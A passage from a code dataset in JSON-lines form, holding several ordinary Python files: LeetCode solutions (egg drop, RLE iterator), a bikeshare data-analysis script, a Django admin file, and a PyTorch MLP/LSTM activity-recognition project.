的含义是k个鸡蛋 移动m次最多能够确定多少楼层\n这个角度思考\ndp[k][m] 最多能够确定的楼层数为L\n那么我选定第一个扔的楼层之后,我要么碎,要么不碎\n这就是把L分成3段\n左边是碎的那段 长度是dp[k][m - 1]\n右边是没碎的那段 长度是dp[k-1][m - 1] 因为已经碎了一个了\n中间是我选定扔的楼层 是1\n所以递推公式是\ndp[k][m] = dp[k - 1][m - 1] + dp[k][m - 1] + 1\n\n\"\"\"\n\nclass Solution:\n def superEggDrop(self, K: int, N: int) -> int:\n dp = [0] * (K + 1)\n m = 0\n while dp[K] < N:\n m += 1\n for k in range(K, 0, -1):\n # print(m, k)\n dp[k] = dp[k - 1] + dp[k] + 1\n return m","sub_path":"medium/887-superEggDrop.py","file_name":"887-superEggDrop.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"190688314","text":"\"\"\"\n900\nmedium\nRLE iterator\n\"\"\"\n\nfrom typing import List\n\nclass RLEIterator:\n\n # Naive method TLE\n\n def __init__(self, encoding: List[int]):\n self.decoded = []\n self.counter = 0\n i = 0\n while i < len(encoding):\n rep = encoding[i]\n num = encoding[i+1]\n for _ in range(rep):\n self.decoded.append(num)\n i += 2\n\n\n def next(self, n: int) -> int:\n self.counter += n\n if self.counter < len(self.decoded):\n return self.decoded[self.counter-1]\n else:\n return -1\n\n# Your RLEIterator object will be instantiated and called as such:\n# obj = RLEIterator(encoding)\n# param_1 = obj.next(n)","sub_path":"Q900.py","file_name":"Q900.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"36852411","text":"import time\nimport pandas as pd\nimport numpy as np\nimport calendar as cal\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n city_check = ('chicago', 'chi', 'new york city', 'ny', 'washington', 'was')\n while True:\n city = input('Which city? Chicago(CHI), New York City (NY), or Washington (WAS)? ')\n if city.lower() in city_check:\n break\n print('Your entry is not a valid city. Please reenter city.')\n\n if city.lower() == 'chi':\n city = 'Chicago'\n elif city.lower() == 'ny':\n city = 'New York City'\n elif city.lower() == 'was':\n city = 'Washington'\n\n # get user input for month (all, january, february, ... , june)\n month_check = ('all', 'january', 'february', 'march', 'april', 'may', 'june')\n while True:\n month = input('Which month ? All, January, February, March, April, May, or June? ')\n if month.lower() in month_check:\n break\n print('Your entry is not a valid month. Please reenter month.')\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n day_check = ('all','sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday')\n while True:\n day = input('Which day of the week? All, Sunday, Monday, Tuesday, Wednesday, Thursday, Friday, Saturday? ')\n if day.lower() in day_check:\n break\n print('Your entry is not a valid day of the week. Please reenter day of the week.')\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n # load data file into a dataframe\n df = pd.read_csv(CITY_DATA[city.lower()])\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract month and day of week from Start Time to create new columns\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n\n\n # filter by month if applicable\n if month.lower() != 'all':\n # use the index of the months list to get the corresponding int\n months = ['january', 'february', 'march', 'april', 'may', 'june']\n month = months.index(month.lower()) + 1\n\n # filter by month to create the new dataframe\n df = df[df['month'] == month]\n\n # filter by day of week if applicable\n if day.lower() != 'all':\n # filter by day of week to create the new dataframe\n df = df[df['day_of_week'] == day.title()]\n\n #Fill in or remove all NaN\n\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n pop_month = df['month'].mode()[0]\n print('The most common month was {}.'.format(cal.month_abbr[pop_month]))\n\n # display the most common day of week\n pop_day = df['day_of_week'].mode()[0]\n print('The most common day of the week was {}.'.format(pop_day))\n\n # display the most common start hour\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['hour'] = df['Start Time'].dt.hour\n pop_start_hour = df['hour'].mode()[0]\n if pop_start_hour > 12:\n pop_start_hour = str(pop_start_hour - 12) + ' pm'\n else:\n pop_start_hour = str(pop_start_hour) + ' am'\n print('The most common start hour was {}.'.format(pop_start_hour))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n pop_start_station = df['Start Station'].mode()[0]\n print('The most common starting station was {}.'.format(pop_start_station))\n\n # display most commonly used end station\n pop_end_station = df['End Station'].mode()[0]\n print('The most common end station was {}.'.format(pop_end_station))\n\n # display most frequent combination of start station and end station trip\n start_end_data = df.groupby(['Start Station', 'End Station']).size().sort_values(ascending=False)\n print('The most common trip was {}.'.format(start_end_data.index[0][0] + \" to \" + start_end_data.index[0][1]))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['End Time'] = pd.to_datetime(df['End Time'])\n\n df['time_diff'] = df['End Time'] - df['Start Time']\n\n days = df['time_diff'].sum().days\n hours, remainder = divmod(df['time_diff'].sum().seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n\n print('Total time traveling was {} days, {} hrs, {} mins, and {} seconds.'.format(days, hours, minutes, seconds))\n\n # display mean travel time\n hours, remainder = divmod(df['time_diff'].mean().seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n print('Average trip duration was {} hrs, {} mins, and {} seconds.'.format(hours, minutes, seconds))\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df, city):\n \"\"\"Displays statistics on bikeshare users, excluding Washington from gender and birth year stats.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n users_type = df['User Type'].value_counts()\n print('The counts of the user types are: \\n')\n print(dict(users_type))\n print('\\n')\n # Display counts of gender\n if city.lower() != 'washington':\n users_gen = df['Gender'].value_counts()\n print('The counts of the user\\'s gender are: \\n')\n print(dict(users_gen))\n\n # Display earliest, most recent, and most common year of birth\n print('\\nThe earliest birth year was {}. \\nThe most recent birth year was {}. \\nThe most common birth year is {}.'.format(int(df['Birth Year'].min()), int(df['Birth Year'].max()), int(df['Birth Year'].value_counts().index[0])))\n else:\n print('Washington does not collect data on gender and birth year.')\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef view_raw_data(df):\n \"\"\"Displays 5 lines of raw data based on users request. Prompts user to display 5 more or stop viewing raw data.\"\"\"\n while True:\n view_data = input('\\nWould you like to view the raw data? Data will be displayed 5 lines at a time. Enter yes or no.\\n')\n if view_data.lower() == 'no':\n break\n n=0\n more_data = 'yes'\n while more_data.lower() == 'yes':\n print(df[n:n+5])\n more_data = input('\\nWould you like to see 5 more lines? Yes or No? \\n')\n if more_data.lower() == 'yes':\n n += 5\n elif more_data.lower() == 'no':\n more_data = 'no'\n else:\n more_data =('\\nIncorrect entry. Would you like to see 5 more lines? Yes or No\\n')\n break\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df, city)\n\n view_raw_data(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare_reichwald.py","file_name":"bikeshare_reichwald.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482178262","text":"from django.contrib import admin\nfrom .models import Phone\n\n\nclass PhoneAdmin(admin.ModelAdmin):\n list_display = ['id', 'name', 'price', 'image','release_date', 'lte_exists', 'slug']\n list_filter = ['name', 'price']\n prepopulated_fields = {'slug': ('name',)}\n\n\nadmin.site.register(Phone, PhoneAdmin)\\\n# Register your models here.\n","sub_path":"phones/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140857098","text":"\"\"\"\nCS 535 Deep Learning Final Project\nAuthor: Zhou Fang,Jiale Liu \nFinal Update: 03/20/2018\nDiscription: This project is based on UCI HAR Dataset \"Human Activity recognition \nwith smartphone\" and run code in GPU by pytorch. MLP and LTSM are performed \nand performance are compared between these two algorithms. Improvement are done in feature selection:\nImportance in randomforestclassifier, Mutual imformation feature selection, F-score.\n\"\"\"\nfrom __future__ import print_function\nfrom __future__ import division\nimport matplotlib as mpl\nmpl.use('Agg')\nfrom matplotlib import pyplot as plt\nfrom collections import defaultdict\nimport pandas as pd\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn import preprocessing\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.optim as optim\nfrom sklearn.metrics import confusion_matrix\nimport itertools\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import f_classif\nfrom sklearn.ensemble import RandomForestClassifier\n\nclass MLPNet(nn.Module):\n \"\"\"\n in MLPNet class, MLP model is defined\n \"\"\"\n def __init__(self, num_feature, hidden_dim, batch_size):\n super(MLPNet, self).__init__()\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.fc1 = nn.Linear(num_feature, hidden_dim)\n self.fc2 = nn.Linear(hidden_dim, 6)\n self.hidden = self.init_hidden()\n def init_hidden(self):\n return 512\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return x\n\nclass LSTMNet(nn.Module):\n \"\"\"\n in LSTMNet class, LSTM model is defined\n \"\"\"\n def __init__(self, num_feature, hidden_dim, batch_size):\n super(LSTMNet, self).__init__()\n self.hidden_dim = hidden_dim\n self.batch_size = batch_size\n self.num_feature = num_feature\n self.lstm = nn.LSTM(num_feature, hidden_dim, dropout = 0.5)\n self.fc = nn.Linear(hidden_dim, 6)\n self.hidden = self.init_hidden()\n def init_hidden(self):\n h0 = Variable(torch.zeros(1, self.batch_size, self.hidden_dim).cuda())\n c0 = Variable(torch.zeros(1, self.batch_size, self.hidden_dim).cuda())\n return (h0, c0)\n def forward(self, x):\n x = x.view(-1, self.batch_size, self.num_feature)\n x, self.hidden = self.lstm(x, self.hidden)\n x = self.fc(x[-1])\n return x\n\ndef eval_net(data_x_loader, data_y_loader, total_dict, net):\n \"\"\"\n in eval_net function, evaluate model performance, return loss, accuracy,\n 6 activities accuracy and model\n \"\"\"\n correct = 0\n correct_dict = defaultdict(int)\n acc_dict = defaultdict(int)\n prediction = []\n total = 0\n total_loss = 0\n net.eval() \n criterion = nn.CrossEntropyLoss(size_average=False)\n for i, (params, labels) in enumerate(zip(data_x_loader, data_y_loader)):\n params, labels = (Variable(params).float()).cuda(), Variable(labels).cuda()\n net.batch_size = len(labels)\n net.hidden = net.init_hidden()\n outputs = net(params)\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n for i, predict in enumerate(predicted):\n prediction.append(predict)\n if predict == labels.data[i]:\n correct_dict[predict] += 1\n correct += 1\n loss = criterion(outputs, labels)\n total_loss += loss.data[0]\n for key, item in correct_dict.items():\n acc_dict[key] = item/total_dict[key]\n net.train()\n return total_loss / total, correct / total, acc_dict, prediction, net\n\ndef WriteResult(file, epoch, train_loss, train_acc, test_loss, test_acc):\n \"\"\"\n in WriteResult function, write train loss, test loss, train acc, test acc in each epoch\n \"\"\"\n file.write('EPOCH: %d train_loss: %.5f train_acc: %.5f test_loss: %.5f test_acc %.5f\\n' %\n (epoch+1, train_loss, train_acc, test_loss, test_acc))\n\ndef WriteDictResult(file, epoch, classes, acc_dict):\n \"\"\"\n in WriteDictResult function, write test loss in 6 activities in each epoch\n \"\"\"\n file.write('EPOCH: %d' %(epoch+1))\n for i, item in enumerate(classes):\n file.write(' %s: %.5f' %(item, acc_dict[i]))\n file.write('\\n')\n\ndef drawPlotLoss(num_epochs, loss_out, parameter, resultlist, parameter2):\n \"\"\"\n in drawPlotLoss function, we plot the train and test loss with model and save it.\n \"\"\"\n plt.figure()\n plt.plot(range(1,num_epochs + 1), loss_out[0], '-bo', label = \"%s %s\" %(resultlist[0], parameter))\n plt.plot(range(1,num_epochs + 1), loss_out[1], '-yv', label = \"%s %s\" %(resultlist[1], parameter))\n plt.plot(range(1,num_epochs + 1), loss_out[2], '-cd', label = \"%s %s\" %(resultlist[2], parameter))\n plt.plot(range(1,num_epochs + 1), loss_out[3], '-rs', label = \"%s %s\" %(resultlist[3], parameter))\n plt.xlim(1, num_epochs)\n plt.ylim(0, 1.5)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"%s\" %(parameter))\n plt.grid(True)\n plt.legend(loc = 'upper right')\n plt.title(\"%s of %s and %s\" %(parameter, parameter2[0], parameter2[1]))\n plt.savefig((\"%s of %s and %s.png\" %(parameter, parameter2[0], parameter2[1])))\n\ndef drawPlotAcc(num_epochs, acc_out, parameter, resultlist, parameter2):\n \"\"\"\n in drawPlotAcc function, we plot the train and test accuracy with different model and save it.\n \"\"\"\n plt.figure()\n plt.plot(range(1,num_epochs + 1), acc_out[0], '-bo', label = \"%s %s\" %(resultlist[0], parameter))\n plt.plot(range(1,num_epochs + 1), acc_out[1], '-yv', label = \"%s %s\" %(resultlist[1], parameter))\n plt.plot(range(1,num_epochs + 1), acc_out[2], '-cd', label = \"%s %s\" %(resultlist[2], parameter))\n plt.plot(range(1,num_epochs + 1), acc_out[3], '-rs', label = \"%s %s\" %(resultlist[3], parameter))\n plt.xlim(1, num_epochs)\n plt.ylim(0.5, 1.0)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"%s\" %(parameter))\n plt.grid(True)\n plt.legend(loc = 'lower right')\n plt.title(\"%s of %s and %s\" %(parameter, parameter2[0], parameter2[1]))\n plt.savefig((\"%s of %s and %s.png\" %(parameter, parameter2[0], parameter2[1])))\n\ndef drawPlotDict(num_epochs, acc_out, classes, model):\n \"\"\"\n in drawPlotDict function, we plot the test accuracy with 6 activities and save it.\n \"\"\"\n color_list = ['-go', '-rs', '-bp', '-cd', '-k*', '-yv']\n plt.figure()\n for i, parameter in enumerate(classes):\n plt.plot(range(1,num_epochs + 1), acc_out[i], color_list[i], label = \"%s Accuracy\" %(str(parameter)))\n plt.xlim(0, num_epochs)\n plt.ylim(0.5, 1.01)\n plt.xlabel(\"Epoch\")\n plt.ylabel(\"Test accuracy\")\n plt.grid(True)\n plt.legend(loc = 'lower right')\n plt.title(\"%s Test Accuracy With Different Activity\" %(str(model)))\n plt.savefig(\"%s_test_accuracy_with_different_dctivity.png\" %(str(model)))\n\ndef drawPlotBar(classes, list1, list2, parameter):\n \"\"\"\n in drawPlotBar function, we plot 6 activities acc at best accuracy achieved epoch with different models.\n \"\"\"\n plt.figure(figsize=(9, 7))\n x = list(range(6))\n width = 0.35\n plot1 = plt.bar(x, list1, width = width, color = '#0072BC', label = parameter[0])\n for i in range(6):\n x[i] = x[i] + width\n plot2 = plt.bar(x, list2, width = width, color = '#ED1C24', label = parameter[1])\n plt.xticks(x, classes, rotation = 10)\n plt.ylim(0,105)\n plt.ylabel(\"Accuracy(percentage)\")\n plt.legend(loc = 'lower right')\n def add_labels(valuelist):\n for value in valuelist:\n height = value.get_height()\n plt.text(value.get_x() + value.get_width() / 2, height, height, ha='center', va='bottom')\n value.set_edgecolor('white')\n add_labels(plot1)\n add_labels(plot2)\n plt.title(\"Comparison Between %s And %s With Different Activity\" %(parameter[0], parameter[1]))\n plt.savefig(\"comparison_between_%s_and_%s_with_different_activity.png\" %(parameter[0], parameter[1]))\n\ndef figurePlot(MAX_EPOCH, classes, train_loss_MLP, test_loss_MLP, train_loss_LSTM,\n test_loss_LSTM, train_acc_MLP, test_acc_MLP,train_acc_LSTM,test_acc_LSTM,\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP,\n walkingdown_acc_MLP, walkingup_acc_MLP, laying_acc_LSTM, sitting_acc_LSTM,\n standing_acc_LSTM, walking_acc_LSTM, walkingdown_acc_LSTM, walkingup_acc_LSTM, file,\n parameter1, parameter2, parameter3):\n \"\"\"\n in figurePlot function, we plot the train and test accuracy with different model, \n the train and test loss with different model, the test accuracy in 6 activities with different model\n \"\"\"\n y1 = []\n y1.append(train_loss_MLP)\n y1.append(test_loss_MLP)\n y1.append(train_loss_LSTM)\n y1.append(test_loss_LSTM)\n drawPlotLoss(MAX_EPOCH, y1, parameter1[0], parameter2, parameter3)\n y2 = []\n y2.append(train_acc_MLP)\n y2.append(test_acc_MLP)\n y2.append(train_acc_LSTM)\n y2.append(test_acc_LSTM)\n drawPlotAcc(MAX_EPOCH, y2, parameter1[1], parameter2, parameter3)\n y3 = []\n y3.append(laying_acc_MLP)\n y3.append(sitting_acc_MLP)\n y3.append(standing_acc_MLP)\n y3.append(walking_acc_MLP)\n y3.append(walkingdown_acc_MLP)\n y3.append(walkingup_acc_MLP)\n drawPlotDict(MAX_EPOCH, y3, classes, parameter3[0])\n y4 = []\n y4.append(laying_acc_LSTM)\n y4.append(sitting_acc_LSTM)\n y4.append(standing_acc_LSTM)\n y4.append(walking_acc_LSTM)\n y4.append(walkingdown_acc_LSTM)\n y4.append(walkingup_acc_LSTM)\n drawPlotDict(MAX_EPOCH, y4, classes, parameter3[1])\n list1 = []\n max_index1 = test_acc_MLP.index(max(test_acc_MLP))\n file.write(\"%d\\n\" %(max_index1 + 1))\n list1.append(float('%.2f'%(laying_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(sitting_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(standing_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(walking_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(walkingdown_acc_MLP[max_index1]*100)))\n list1.append(float('%.2f'%(walkingup_acc_MLP[max_index1]*100)))\n list2 = []\n max_index2 = test_acc_LSTM.index(max(test_acc_LSTM))\n file.write(\"%d\\n\" %(max_index2 + 1))\n list2.append(float('%.2f'%(laying_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(sitting_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(standing_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(walking_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(walkingdown_acc_LSTM[max_index2]*100)))\n list2.append(float('%.2f'%(walkingup_acc_LSTM[max_index2]*100)))\n drawPlotBar(classes, list1, list2, parameter3)\n\ndef LoadData(train, test, FC_fscore, FC_mifs):\n \"\"\"\n in LoadData function, we load train and test data and put them into dataloader.\n return 6 activities, count for 6 activities, train_x, test_x, train_y and test_y dataloader, also\n get dataloader for feature selection.\n \"\"\"\n train_data = pd.read_csv(train)\n test_data = pd.read_csv(test)\n train_data = shuffle(train_data)\n test_data = shuffle(test_data)\n train_label = train_data['Activity']\n test_label = test_data['Activity']\n train_x = np.asarray(train_data.drop(['subject', 'Activity'], axis=1))\n test_x = np.asarray(test_data.drop(['subject', 'Activity'], axis=1))\n\n # 561 features dataloader\n train_x_loader = torch.utils.data.DataLoader(train_x, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n test_x_loader = torch.utils.data.DataLoader(test_x, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n\n # transfer classes into integer\n encoder = preprocessing.LabelEncoder()\n encoder.fit(train_label)\n classes = list(encoder.classes_)\n train_y = np.asarray(encoder.transform(train_label))\n test_y = np.asarray(encoder.transform(test_label))\n\n # get 561 features name\n x_columns = [x for x in train_data.columns if x not in ['subject', 'Activity']]\n\n # chosse feature by F-score\n file = open(FC_fscore, 'r')\n selected_index = file.read().split(' ')\n selected_index = map(int, selected_index[: -1])\n print(\"numbers of selected feature for F-score: %d\" %(len(selected_index)))\n file.close()\n selected_feature = []\n for i in selected_index:\n selected_feature.append(x_columns[i])\n train_x = np.asarray(pd.DataFrame(train_data, columns=selected_feature))\n test_x = np.asarray(pd.DataFrame(test_data, columns=selected_feature))\n train_x_loader_fscore = torch.utils.data.DataLoader(train_x, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n test_x_loader_fscore = torch.utils.data.DataLoader(test_x, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n\n # choose feature by MIFS\n file = open(FC_mifs, 'r')\n selected_index = file.read().split(' ')\n selected_index = map(int, selected_index[: -1])\n print(\"numbers of selected feature for MIFS: %d\" %(len(selected_index)))\n file.close()\n selected_feature = []\n for i in selected_index:\n selected_feature.append(x_columns[i])\n train_x = np.asarray(pd.DataFrame(train_data, columns=selected_feature))\n test_x = np.asarray(pd.DataFrame(test_data, columns=selected_feature))\n train_x_loader_mifs = torch.utils.data.DataLoader(train_x, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n test_x_loader_mifs = torch.utils.data.DataLoader(test_x, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n\n # choose feature by randomforestclassifier\n rf0 = RandomForestClassifier()\n rf0.fit(train_x, train_y)\n importances = rf0.feature_importances_\n\n for feature, score in zip(x_columns, importances):\n if score <= 0.0001:\n train_data = train_data.drop(feature, axis = 1)\n test_data = test_data.drop(feature, axis = 1)\n train_data = train_data.drop(['subject', 'Activity'], axis=1)\n test_data = test_data.drop(['subject', 'Activity'], axis=1)\n import_feature = len(train_data.columns)\n file1 = open(\"train and test data imformation.txt\", \"w\")\n file1.write('Selected feature numbers(randomforestclassifier): %d\\n\\n' %(import_feature))\n file1.write('Selected feature columns(randomforestclassifier):')\n for name_feature in train_data.columns:\n file1.write('%s ' %(name_feature))\n file1.write(\"\\n\\n\")\n train_x1 = np.asarray(train_data)\n test_x1 = np.asarray(test_data)\n train_import_x_loader = torch.utils.data.DataLoader(train_x1, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n test_import_x_loader = torch.utils.data.DataLoader(test_x1, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n\n # write count for 6 classes in train and test dataset into file\n train_total_dict = defaultdict(int)\n test_total_dict = defaultdict(int)\n for i in train_y:\n train_total_dict[i] += 1\n for i in test_y:\n test_total_dict[i] += 1\n file1.write('Numbers of 6 Activities in Train:\\n')\n for key, item in train_total_dict.items():\n file1.write('%s: %d\\n' %(classes[key], item))\n file1.write('Numbers of 6 Activities in Test:\\n')\n for key, item in test_total_dict.items():\n file1.write('%s: %d\\n' %(classes[key], item))\n file1.close()\n\n # build label dataloader\n train_y_loader = torch.utils.data.DataLoader(train_y, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n test_y_loader = torch.utils.data.DataLoader(test_y, batch_size=BATCH_SIZE,\n shuffle=False, num_workers=4)\n return classes, train_total_dict, test_total_dict, import_feature, train_x_loader,\\\n train_y_loader, test_x_loader, test_y_loader, train_x_loader_fscore, test_x_loader_fscore,\\\n train_x_loader_mifs, test_x_loader_mifs, train_import_x_loader, test_import_x_loader, train_y, test_y\n\ndef Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader, train_y_loader, test_x_loader, test_y_loader):\n \"\"\"\n in Classifier function, we train the model and predict test label. return loss results,\n prediction results and 6 activities prediction result.\n \"\"\"\n train_loss_model = []\n train_acc_model = []\n test_loss_model = []\n test_acc_model = []\n laying_acc = []\n sitting_acc = []\n standing_acc = []\n walking_acc = []\n walkingdown_acc = []\n walkingup_acc = []\n criterion = nn.CrossEntropyLoss()\n test_acc_pre = 0\n for epoch in range(MAX_EPOCH):\n running_loss = 0.0\n for i, (inputs, labels) in enumerate(zip(train_x_loader, train_y_loader)):\n inputs, labels = (Variable(inputs).float()).cuda(), Variable(labels).cuda()\n optimizer.zero_grad()\n net.batch_size = len(labels)\n net.hidden = net.init_hidden()\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n print('Finish training EPOCH %d, start evaluating...' %(epoch+1))\n train_loss, train_acc, train_acc_dict, train_prediction, net = eval_net(train_x_loader, train_y_loader, train_total_dict, net)\n test_loss, test_acc, test_acc_dict, test_prediction, net = eval_net(test_x_loader, test_y_loader, test_total_dict, net)\n train_loss_model.append(train_loss)\n train_acc_model.append(train_acc)\n test_loss_model.append(test_loss)\n test_acc_model.append(test_acc)\n laying_acc.append(test_acc_dict[0])\n sitting_acc.append(test_acc_dict[1])\n standing_acc.append(test_acc_dict[2])\n walking_acc.append(test_acc_dict[3])\n walkingdown_acc.append(test_acc_dict[4])\n walkingup_acc.append(test_acc_dict[5])\n # we only output the best prediction\n if test_acc_pre < test_acc:\n best_prediction = test_prediction\n test_acc_pre = test_acc\n # print('EPOCH: %d train_loss: %.5f train_acc: %.5f test_loss: %.5f test_acc %.5f' %\n # (epoch+1, train_loss, train_acc, test_loss, test_acc))\n WriteDictResult(file2, epoch, classes, test_acc_dict)\n WriteResult(file1, epoch, train_loss, train_acc, test_loss, test_acc)\n return train_loss_model, train_acc_model, test_loss_model, test_acc_model,laying_acc,\\\n sitting_acc, standing_acc, walking_acc, walkingdown_acc, walkingup_acc, best_prediction\n\ndef PlotConfusionMatrix(cm, classes, normalize=False, title='Confusion matrix', cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.figure(figsize=(11.2, 8))\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=10)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig(\"%s.png\" %(str(title)))\n\nif __name__ == \"__main__\":\n\n # Pparameter define\n BATCH_SIZE = 32 # mini_batch size, can be changed\n MAX_EPOCH = 50 # maximum epoch to train, can be changed\n NUM_FEATURE = 561 # input feature numbers, cannot be changed\n\n # data loaders. classes is 6 activities.\n # train_total_dict and test_total_dict is count for 6 activities.\n train = \"train.csv\"\n test = \"test.csv\"\n FC_fscore = \"selected feature f_score.txt\" \n FC_mifs = \"selected feature MIFS.txt\" \n print(\"Data loading and processing...\")\n classes, train_total_dict, test_total_dict, import_feature,\\\n train_x_loader, train_y_loader, test_x_loader, test_y_loader, train_x_loader_fscore, test_x_loader_fscore,\\\n train_x_loader_mifs, test_x_loader_mifs, train_import_x_loader,\\\n test_import_x_loader, train_y, test_y = LoadData(train, test, FC_fscore, FC_mifs)\n print(\"Finished data loading and processing...\")\n \n # MLP Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 95%\n net = MLPNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"MLP Classifier Result.txt\", \"w\")\n file2 = open(\"MLP Classifier Dict Result.txt\", \"w\")\n file1.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n file2.write('Number of select feature: %d\\n' %(NUM_FEATURE))\n optimizer = optim.SGD(net.parameters(), lr=0.0009, momentum=0.9)\n #optimizer = optim.Adam(net.parameters(), lr=0.00043, betas=(0.9, 0.999), eps=1e-1)\n print('Start MLP training...')\n train_loss_MLP, train_acc_MLP, test_loss_MLP, test_acc_MLP,\\\n laying_acc_MLP, sitting_acc_MLP, standing_acc_MLP, walking_acc_MLP, walkingdown_acc_MLP,\\\n walkingup_acc_MLP, test_prediction_MLP = Classifier(net, file1, file2, optimizer, BATCH_SIZE, MAX_EPOCH, classes, train_total_dict, \n test_total_dict, train_x_loader, train_y_loader, test_x_loader, test_y_loader)\n file1.close()\n file2.close()\n print('Finished MLP Training...')\n\n # LSTM Classifier, train 50 epoches, return train loss, test loss, train acc, test acc,\n # and test acc for different activity. Best test acc around 95%\n net = LSTMNet(num_feature=NUM_FEATURE, hidden_dim=512, batch_size=BATCH_SIZE)\n net = net.cuda()\n net.train()\n file1 = open(\"LSTM 